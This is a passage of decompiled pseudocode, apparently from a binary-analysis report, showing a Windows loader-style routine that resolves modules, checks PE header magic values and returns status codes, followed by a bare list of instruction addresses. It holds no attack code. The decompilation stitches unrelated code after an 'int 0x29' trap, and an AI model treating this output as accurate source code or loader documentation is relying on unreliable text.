				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x49fd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E04916600(0x49f52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x49f7b9c; // 0x0
							_t281 = L04924620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0494F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x49f7b90; // 0x772a0000
								if(_t384 == 0) {
									_t353 =  *0x49f7b8c; // 0xc63db8
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0xc63e68
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E04922280(_t200, 0x49f84d8);
									_t277 =  *0x49f85f4; // 0xc62b40
									_t351 =  *0x49f85f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x74780000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0xc61f30
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0xc62ad8
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0xc61f30
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0xc61fe0
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0491FFB0(_t287, _t353, 0x49f84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0495CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E04916600(0x49f52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E04917926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x49fb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0498E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x49f8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x49fb218; // 0x0
														asm("ror edi, cl");
														 *0x49fb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E04922280(_t250, 0x49f84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04943898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0491FFB0(_t293, _t353, 0x49f84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E049437F5(_t353, 0);
																}
																E04940413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04939B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E049302D6(_t174);
																}
																L049277F0( *0x49f7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0493C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0491EC7F(_t353);
										L049319B8(_t287, 0, _t353, 0);
										_t200 = E0490F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0494B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x49fb2f8; // 0xe00000
									if((_t206 |  *0x49fb2fc) == 0 || ( *0x49fb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x49fb2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E049B6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E049B6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0491E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0491EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E04949730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0491E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L04918F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04943C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                                      0x0491d5f2
                                                      0x0491d5f5
                                                      0x0491d5f5
                                                      0x0491d5fd
                                                      0x0491d600
                                                      0x0491d60a
                                                      0x0491d60d
                                                      0x0491d617
                                                      0x0491d61d
                                                      0x0491d627
                                                      0x0491d62e
                                                      0x0491d911
                                                      0x0491d913
                                                      0x00000000
                                                      0x0491d919
                                                      0x0491d919
                                                      0x0491d919
                                                      0x0491d634
                                                      0x0491d634
                                                      0x0491d634
                                                      0x0491d634
                                                      0x0491d640
                                                      0x0491d8bf
                                                      0x00000000
                                                      0x0491d646
                                                      0x0491d646
                                                      0x0491d64d
                                                      0x0491d652
                                                      0x0496b2fc
                                                      0x0496b2fc
                                                      0x0496b302
                                                      0x0496b33b
                                                      0x0496b341
                                                      0x00000000
                                                      0x0496b304
                                                      0x0496b304
                                                      0x0496b319
                                                      0x0496b31e
                                                      0x0496b324
                                                      0x0496b326
                                                      0x0496b332
                                                      0x0496b347
                                                      0x0496b34c
                                                      0x0496b351
                                                      0x0496b35a
                                                      0x00000000
                                                      0x0496b328
                                                      0x0496b328
                                                      0x00000000
                                                      0x0496b328
                                                      0x0496b326
                                                      0x0491d658
                                                      0x0491d658
                                                      0x0491d65b
                                                      0x0491d665
                                                      0x00000000
                                                      0x0491d66b
                                                      0x0491d66b
                                                      0x0491d66b
                                                      0x0491d66b
                                                      0x0491d66d
                                                      0x0491d672
                                                      0x0491d67a
                                                      0x00000000
                                                      0x00000000
                                                      0x0491d680
                                                      0x0491d686
                                                      0x0491d8ce
                                                      0x0491d8d4
                                                      0x0491d8da
                                                      0x0491d8dd
                                                      0x0491d8dd
                                                      0x0491d8e0
                                                      0x0491d68c
                                                      0x0491d691
                                                      0x0491d69d
                                                      0x0491d6a2
                                                      0x0491d6a7
                                                      0x0491d6b0
                                                      0x0491d6b0
                                                      0x0491d6b5
                                                      0x0491d6e0
                                                      0x0491d6b7
                                                      0x0491d6b7
                                                      0x0491d6b9
                                                      0x0491d6b9
                                                      0x0491d6bb
                                                      0x0491d6bd
                                                      0x0491d6ce
                                                      0x0491d6d0
                                                      0x0491d6d2
                                                      0x0496b363
                                                      0x0496b365
                                                      0x00000000
                                                      0x0496b36b
                                                      0x00000000
                                                      0x0496b36b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0491d6bf
                                                      0x0491d6bf
                                                      0x0491d6e5
                                                      0x0491d6e7
                                                      0x0491d6e9
                                                      0x0491d6e9
                                                      0x0491d6ec
                                                      0x0491d6ec
                                                      0x0491d6ef
                                                      0x0491d6f5
                                                      0x0491d6f9
                                                      0x0491d6fb
                                                      0x0491d6fd
                                                      0x0491d701
                                                      0x0491d703
                                                      0x0491d70a
                                                      0x0491d70a
                                                      0x0491d70a
                                                      0x0491d701
                                                      0x0491d70d
                                                      0x0491d710
                                                      0x0491d710
                                                      0x0491d6c1
                                                      0x0491d6c1
                                                      0x0491d6c1
                                                      0x0491d6c6
                                                      0x0496b36d
                                                      0x0496b36f
                                                      0x00000000
                                                      0x0496b375
                                                      0x0496b375
                                                      0x0496b375
                                                      0x00000000
                                                      0x0496b375
                                                      0x00000000
                                                      0x0491d6cc
                                                      0x0491d6d8
                                                      0x0491d6d8
                                                      0x0491d6d8
                                                      0x00000000
                                                      0x0491d6c6
                                                      0x0491d6bf
                                                      0x00000000
                                                      0x0491d6da
                                                      0x0491d6da
                                                      0x0491d716
                                                      0x0491d71b
                                                      0x0491d720
                                                      0x0491d726
                                                      0x0491d726
                                                      0x0491d72d
                                                      0x00000000
                                                      0x0491d733
                                                      0x0491d739
                                                      0x0491d742
                                                      0x0491d750
                                                      0x0491d758
                                                      0x0491d764
                                                      0x0491d776
                                                      0x0491d77a
                                                      0x0491d783
                                                      0x0491d928
                                                      0x0491d92c
                                                      0x0491d93d
                                                      0x0491d944
                                                      0x0491d94f
                                                      0x0491d954
                                                      0x0491d956
                                                      0x0491d95f
                                                      0x0491d961
                                                      0x0491d973
                                                      0x0491d973
                                                      0x0491d956
                                                      0x0491d944
                                                      0x0491d92c
                                                      0x0491d78b
                                                      0x0496b394
                                                      0x0491d791
                                                      0x0491d798
                                                      0x0496b3a3
                                                      0x0496b3bb
                                                      0x0496b3bb
                                                      0x0491d7a5
                                                      0x0491d866
                                                      0x0491d870
                                                      0x0491d884
                                                      0x0491d892
                                                      0x0491d898
                                                      0x0491d89e
                                                      0x0491d8a0
                                                      0x0491d8a6
                                                      0x0491d8ac
                                                      0x0491d8ae
                                                      0x0491d8b4
                                                      0x0491d8b4
                                                      0x0491d8ae
                                                      0x0491d7a5
                                                      0x0491d78b
                                                      0x0491d7b1
                                                      0x0496b3c5
                                                      0x0496b3c5
                                                      0x0491d7c3
                                                      0x0491d7ca
                                                      0x0491d7e5
                                                      0x0491d7eb
                                                      0x0491d8eb
                                                      0x0491d8ed
                                                      0x00000000
                                                      0x0491d8f3
                                                      0x0491d8f3
                                                      0x0491d8f3
                                                      0x00000000
                                                      0x0491d8ed
                                                      0x0491d7cc
                                                      0x0491d7cc
                                                      0x0491d7d2
                                                      0x00000000
                                                      0x0491d7d4
                                                      0x0491d7d4
                                                      0x0491d7d7
                                                      0x0491d7df
                                                      0x0496b3d4
                                                      0x0496b3d9
                                                      0x0496b3dc
                                                      0x0496b3dc
                                                      0x0496b3df
                                                      0x0496b3e2
                                                      0x0496b468
                                                      0x0496b46d
                                                      0x0496b46f
                                                      0x0496b46f
                                                      0x0496b475
                                                      0x0491d8f8
                                                      0x0491d8f9
                                                      0x0491d8fd
                                                      0x0496b3e8
                                                      0x0496b3e8
                                                      0x0496b3eb
                                                      0x0496b3ed
                                                      0x00000000
                                                      0x0496b3ef
                                                      0x0496b3ef
                                                      0x0496b3f1
                                                      0x0496b3f4
                                                      0x0496b3fe
                                                      0x0496b404
                                                      0x0496b409
                                                      0x0496b40e
                                                      0x0496b410
                                                      0x0496b410
                                                      0x0496b414
                                                      0x0496b414
                                                      0x0496b41b
                                                      0x0496b420
                                                      0x0496b423
                                                      0x0496b425
                                                      0x0496b427
                                                      0x0496b42a
                                                      0x0496b42d
                                                      0x0496b42d
                                                      0x0496b42a
                                                      0x0496b432
                                                      0x0496b436
                                                      0x0496b438
                                                      0x0496b43b
                                                      0x0496b43b
                                                      0x0496b449
                                                      0x0496b44e
                                                      0x0496b454
                                                      0x0496b458
                                                      0x0496b458
                                                      0x0496b45d
                                                      0x00000000
                                                      0x0496b45d
                                                      0x0496b3ed
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0491d7df
                                                      0x0491d7d2
                                                      0x0491d7ca
                                                      0x0496b37c
                                                      0x0496b37e
                                                      0x0496b385
                                                      0x0496b38a
                                                      0x00000000
                                                      0x0496b38a
                                                      0x0491d742
                                                      0x0491d7f1
                                                      0x0491d7f8
                                                      0x0496b49b
                                                      0x0496b49b
                                                      0x0491d800
                                                      0x0491d837
                                                      0x0491d843
                                                      0x0491d845
                                                      0x0491d847
                                                      0x0491d84a
                                                      0x0491d84b
                                                      0x0491d84e
                                                      0x0491d857
                                                      0x0491d802
                                                      0x0491d802
                                                      0x0491d80d
                                                      0x00000000
                                                      0x0491d818
                                                      0x0491d818
                                                      0x0491d824
                                                      0x0491d831
                                                      0x0496b4a5
                                                      0x0496b4ab
                                                      0x0496b4b3
                                                      0x0496b4b8
                                                      0x0496b4bb
                                                      0x00000000
                                                      0x0496b4c1
                                                      0x0496b4c1
                                                      0x0496b4c8
                                                      0x00000000
                                                      0x0496b4ce
                                                      0x0496b4d4
                                                      0x0496b4e1
                                                      0x0496b4e3
                                                      0x0496b4e5
                                                      0x00000000
                                                      0x0496b4eb
                                                      0x0496b4f0
                                                      0x0496b4f2
                                                      0x0491dac9
                                                      0x0491dacc
                                                      0x0491dacf
                                                      0x0491dad1
                                                      0x0491dd78
                                                      0x0491dd78
                                                      0x0491dcf2
                                                      0x00000000
                                                      0x0491dad7
                                                      0x0491dad9
                                                      0x0491dadb
                                                      0x00000000
                                                      0x00000000
                                                      0x0491dae1
                                                      0x0491dae1
                                                      0x0491dae4
                                                      0x0491dae6
                                                      0x0496b4f9
                                                      0x0496b4f9
                                                      0x0496b500
                                                      0x0491daec
                                                      0x0491daec
                                                      0x0491daf5
                                                      0x0491daf8
                                                      0x0491dafb
                                                      0x0491db03
                                                      0x0491db11
                                                      0x0491db16
                                                      0x0491db19
                                                      0x0491db1b
                                                      0x0496b52c
                                                      0x0496b531
                                                      0x0496b534
                                                      0x0491db21
                                                      0x0491db21
                                                      0x0491db24
                                                      0x0491dcd9
                                                      0x0491dce2
                                                      0x0491dce5
                                                      0x0491dd6a
                                                      0x0491dd6d
                                                      0x00000000
                                                      0x0491dd73
                                                      0x0496b51a
                                                      0x0496b51c
                                                      0x0496b51f
                                                      0x0496b524
                                                      0x00000000
                                                      0x0496b524
                                                      0x0491dce7
                                                      0x0491dce7
                                                      0x0491dce7
                                                      0x00000000
                                                      0x0491dce7
                                                      0x00000000
                                                      0x0491db2a
                                                      0x0491db2c
                                                      0x0491db31
                                                      0x0491db33
                                                      0x0491db36
                                                      0x0491db39
                                                      0x0491db3b
                                                      0x0491db66
                                                      0x0491db66
                                                      0x0491db3d
                                                      0x0491db3d
                                                      0x0491db3e
                                                      0x0491db46
                                                      0x0491db47
                                                      0x0491db49
                                                      0x0491db4c
                                                      0x0491db53
                                                      0x0491db55
                                                      0x0491db58
                                                      0x0491db5a
                                                      0x0496b50a
                                                      0x0496b50f
                                                      0x0496b512
                                                      0x0491db60
                                                      0x0491db60
                                                      0x0491db63
                                                      0x0491db63
                                                      0x00000000
                                                      0x0491db63
                                                      0x0491db5a
                                                      0x0491db3b
                                                      0x0491db24
                                                      0x0491db69
                                                      0x0491db69
                                                      0x0491db6c
                                                      0x0491db6f
                                                      0x0491db74
                                                      0x0496b557
                                                      0x0496b557
                                                      0x0496b55e
                                                      0x0491db7a
                                                      0x0491db7c
                                                      0x0491db7f
                                                      0x0491db82
                                                      0x0491db85
                                                      0x00000000
                                                      0x0491db8b
                                                      0x0491db8b
                                                      0x0491db8d
                                                      0x0491db9b
                                                      0x0491db9b
                                                      0x0491db9d
                                                      0x0491dba0
                                                      0x0491dba2
                                                      0x0491dba4
                                                      0x0491dba7
                                                      0x0491dba9
                                                      0x0491dbae
                                                      0x0491dbae
                                                      0x0491dbb1
                                                      0x0491dbb4
                                                      0x0491dbb4
                                                      0x0491dbb7
                                                      0x0491dbba
                                                      0x0491dcd2
                                                      0x0491dcd4
                                                      0x00000000
                                                      0x0491dbc0
                                                      0x0491dbc0
                                                      0x0491dbd2
                                                      0x0491dbd7
                                                      0x0491dbda
                                                      0x0491dbdd
                                                      0x0491dbdf
                                                      0x00000000
                                                      0x0491dbe5
                                                      0x0491dbe5
                                                      0x0491dbee
                                                      0x0491dbf1
                                                      0x0496b541
                                                      0x0496b544
                                                      0x00000000
                                                      0x0496b546
                                                      0x0496b546
                                                      0x00000000
                                                      0x0496b546
                                                      0x0491dbf7
                                                      0x0491dbf7
                                                      0x0491dbfd
                                                      0x0491dbfd
                                                      0x0491dbff
                                                      0x0491dc0b
                                                      0x0491dc15
                                                      0x0491dc1b
                                                      0x0491dc1d
                                                      0x0491dc21
                                                      0x0491dc21
                                                      0x0491dc23
                                                      0x0491dc23
                                                      0x0491dc26
                                                      0x0491dc29
                                                      0x0491dc2b
                                                      0x00000000
                                                      0x00000000
                                                      0x0491dc31
                                                      0x0491dc34
                                                      0x0491dc36
                                                      0x0491dcbf
                                                      0x0491dcbf
                                                      0x0491dcc2
                                                      0x00000000
                                                      0x0491dc3c
                                                      0x0491dc41
                                                      0x0491dc43
                                                      0x00000000
                                                      0x0491dc45
                                                      0x0491dc45
                                                      0x0491dc47
                                                      0x00000000
                                                      0x0491dc4d
                                                      0x0491dc4d
                                                      0x0491dc50
                                                      0x0491dc52
                                                      0x0491dc55
                                                      0x0491dcfa
                                                      0x0491dcfe
                                                      0x0491dd08
                                                      0x0491dd0a
                                                      0x0491dd0c
                                                      0x00000000
                                                      0x0491dd12
                                                      0x0491dd15
                                                      0x0491dd2d
                                                      0x0491dd2f
                                                      0x0491dd32
                                                      0x0491dd35
                                                      0x00000000
                                                      0x0491dd35
                                                      0x0491dc5b
                                                      0x0491dc5b
                                                      0x0491dc5e
                                                      0x0491dc61
                                                      0x0491dc64
                                                      0x0491dc67
                                                      0x0491dc67
                                                      0x0491dc6a
                                                      0x0491dc6c
                                                      0x0491dc8e
                                                      0x0491dc8e
                                                      0x0491dc91
                                                      0x0491dc93
                                                      0x0491dcce
                                                      0x0491dcce
                                                      0x0491dc95
                                                      0x0491dc9c
                                                      0x0491dc6e
                                                      0x0491dc72
                                                      0x0491dc75
                                                      0x0491dc77
                                                      0x0491dc79
                                                      0x0496b551
                                                      0x0496b551
                                                      0x00000000
                                                      0x0491dc7f
                                                      0x0491dc7f
                                                      0x0491dc81
                                                      0x00000000
                                                      0x0491dc83
                                                      0x0491dc86
                                                      0x0491dc88
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0491dc88
                                                      0x0491dc81
                                                      0x0491dc79
                                                      0x0491dc6c
                                                      0x0491dc55
                                                      0x0491dc47
                                                      0x0491dc43
                                                      0x00000000
                                                      0x0491dc36
                                                      0x0491dc23
                                                      0x00000000
                                                      0x0491dbff
                                                      0x0491dbf1
                                                      0x0491dbdf
                                                      0x0491db8f
                                                      0x0491db92
                                                      0x0491db95
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0491db95
                                                      0x0491db8d
                                                      0x0491db85
                                                      0x0491db74
                                                      0x0491dc9f
                                                      0x0491dca2
                                                      0x0491dcb0
                                                      0x0491dcb0
                                                      0x0491dad1
                                                      0x0496b4e5
                                                      0x0496b4c8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
